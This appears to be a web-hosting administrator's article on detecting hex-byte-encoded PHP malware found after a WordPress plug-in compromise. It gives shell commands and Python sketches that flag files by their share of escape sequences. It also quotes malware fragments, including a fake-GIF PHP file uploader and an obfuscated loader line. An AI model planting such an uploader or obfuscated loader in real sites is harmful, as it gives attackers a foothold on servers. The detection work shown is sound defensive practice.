
Byte encoding exploits in PHP files

By Sid Young

Despite better coding practices, testing and peer review of code, the number of exploit attempts against web sites and the technical complexity of those attacks continue to increase. With the rise in exploit attempts comes a rise in what malware and anti-virus scanners on the web server must do to detect and isolate infected files.

Malware detection has been a serious business for decades and shows no sign of ending any time soon, so IT professionals are kept constantly busy detecting and removing exploit attempts.

Recently one of the WordPress web sites we host was exploited via a vulnerable plug-in. The exploit was designed to send spam emails continuously: it connected back to a server and received a list of email addresses to which it sent specially formatted spam messages. The initial scan of the code base did not pick up the malware, because the PHP code was obfuscated with a previously unseen encoding method, but a visual inspection of the file showed that it used an excessive number of byte-escaped characters.

Many scanners look for base64 encoding. The snippet below shows what a typical base64-encoded PHP file might contain:

<?php eval(gzuncompress(base64_decode

The byte-encoded file, however, looks something like this:

<?php ${"\x47\x4cO\x42A\x4c\x53"}["cgw\x71\x77\x77\x64\x79q"]="\x69p";

Dissecting the first few lines of the code we can see traces of PHP command strings but randomly dispersed:


After some simple character conversions (\x41=A, \x42=B etc) we get:
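As an illustration, the conversion can be sketched in Python and applied to the sample line shown earlier. The function name decode_hex_escapes is hypothetical, and the sketch assumes that only two-digit \xNN escapes need handling; it is not a full PHP string parser.

```python
import re

# Matches a backslash, an "x", and exactly two hex digits (assumption:
# only this two-digit form of the escape appears in the file).
HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")


def decode_hex_escapes(text: str) -> str:
    """Replace every \\xNN escape with the character it stands for."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


# The byte-encoded sample line from the infected file.
sample = r'<?php ${"\x47\x4cO\x42A\x4c\x53"}["cgw\x71\x77\x77\x64\x79q"]="\x69p";'

print(decode_hex_escapes(sample))
# prints: <?php ${"GLOBALS"}["cgwqwwdyq"]="ip";
```

The decoded line shows the pattern: the PHP superglobal name GLOBALS was partly escaped, while the array key is just a random-looking variable name.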


Dissecting the lowercase character strings reveals:


We can clearly see how the code hides behind random variable names. The keywords themselves are also manipulated, with some characters byte encoded and others left unencoded, so that pattern matching is difficult at best.

There is, however, a simple solution. The mere fact that the file uses byte encoding is abnormal: you will be hard pressed to find this style of programming in any normal program, with the exception of encryption code, which uses a lot of hex-encoded tables. The frequency of \xNN character strings is therefore far above normal.

A character count of each file gives an interesting “\xNN” percentage. Using the first infected file, we get the following:

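# wc -c < suspect-file.php

Counting up the \x's we get (the first command keeps every backslash and every x, the second narrows that down to the x characters alone, which approximates the number of \xNN escapes):

# tr -dc '\\x' < suspect-file.php | wc -c
# tr -dc '\\x' < suspect-file.php | tr -dc 'x' | wc -c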

Converting that to a percentage gives (3803/24348)*100 = 15.62% (rounded).
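The same calculation can be sketched in Python. Note the assumption: this version counts complete \xNN sequences with a regular expression rather than every x character, so its figures can come out slightly lower than those from the tr pipeline. The function name hex_escape_percentage is hypothetical.

```python
import re

# A backslash, an "x", and two hex digits, matched against raw bytes.
HEX_ESCAPE = re.compile(rb"\\x[0-9A-Fa-f]{2}")


def hex_escape_percentage(data: bytes) -> float:
    """Return the number of \\xNN escapes per 100 bytes of file content."""
    if not data:
        return 0.0
    return 100.0 * len(HEX_ESCAPE.findall(data)) / len(data)


# The arithmetic from the article: 3803 matches in a 24348-byte file.
print(round(100.0 * 3803 / 24348, 2))  # prints 15.62
```

To measure a file on disk, read it in binary mode and pass the bytes in, for example hex_escape_percentage(open("suspect-file.php", "rb").read()).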

At over 15%, the presence of \xNN values is far too high for a normal PHP program (excluding encryption code files). A quick check of the PHP files on the web server yields an average of less than 2% byte-encoded data per file, with most files below 1%. Some small cache files were found to run as high as 5% because of the additional encoded data the cache application uses, so we can exclude these.

Detecting this type of exploit attempt is now a simple matter of calculating the percentage of encoded bytes in each file, comparing it with what is normal for program code, and flagging any outlier for closer examination later.

A simple script that scans the web server document root for files changed in the last 7 days and applies this check should provide an adequate method until the next round of exploits develops.
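A minimal sketch of such a script follows, written in Python. Everything named here is an assumption rather than the script we actually run: the function names, the .php suffix filter, and the 5% threshold, which was picked only because the cache files mentioned above top out around that level. It counts complete \xNN sequences, not every x character.

```python
import os
import re
import time

HEX_ESCAPE = re.compile(rb"\\x[0-9A-Fa-f]{2}")


def hex_escape_percentage(data: bytes) -> float:
    """Return the number of \\xNN escapes per 100 bytes of file content."""
    if not data:
        return 0.0
    return 100.0 * len(HEX_ESCAPE.findall(data)) / len(data)


def scan_recent_php(doc_root, days=7, threshold=5.0, now=None):
    """List (path, percentage) for recently changed PHP files over the threshold."""
    now = time.time() if now is None else now
    cutoff = now - days * 86400  # files modified before this are skipped
    flagged = []
    for dirpath, _dirnames, filenames in os.walk(doc_root):
        for name in filenames:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                if os.path.getmtime(path) < cutoff:
                    continue
                with open(path, "rb") as handle:
                    data = handle.read()
            except OSError:
                continue  # unreadable or vanished file: skip it
            percentage = hex_escape_percentage(data)
            if percentage > threshold:
                flagged.append((path, percentage))
    return flagged
```

Calling scan_recent_php with the document root (the path depends on the server) returns the files worth a closer look. Known cache directories can be filtered out of the result, and the threshold tuned against a baseline taken from clean files.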


How did the exploit get there?

A check of the /tmp directory by the malware scanner found this file:

# cat /tmp/phpt2oYQG
?GIF89a u
<?php @copy($_FILES[file][tmp_name], $_FILES[file][name]); exit; ?>

A simple upload of a bogus “GIF” file with PHP code inside is the first step. If the attacker can get that code to run, they can then activate the uploaded exploit and they are in business.
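A check for this kind of disguised upload can be sketched in Python as below. It is a heuristic under stated assumptions, not how our scanner works: the function name gif_contains_php and the 16-byte header window are hypothetical, and a genuine image could in rare cases contain the byte sequence "<?php" by chance.

```python
GIF_MAGIC = (b"GIF87a", b"GIF89a")
PHP_OPEN_TAG = b"<?php"


def gif_contains_php(data: bytes, header_window: int = 16) -> bool:
    """True if the data claims to be a GIF near its start and embeds a PHP tag."""
    # Look in a small window rather than at offset 0, because the file
    # found in /tmp had a stray byte in front of the GIF89a signature.
    head = data[:header_window]
    claims_gif = any(magic in head for magic in GIF_MAGIC)
    has_php = PHP_OPEN_TAG in data.lower()
    return claims_gif and has_php


# The file found in /tmp, reproduced as bytes.
sample = (
    b"?GIF89a u\n"
    b"<?php @copy($_FILES[file][tmp_name], $_FILES[file][name]); exit; ?>"
)

print(gif_contains_php(sample))  # prints True
```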

Repeated scanning will pick up both exploits and attempted exploits. We schedule scans on all servers every day, which allows us to tighten our system security on a daily basis.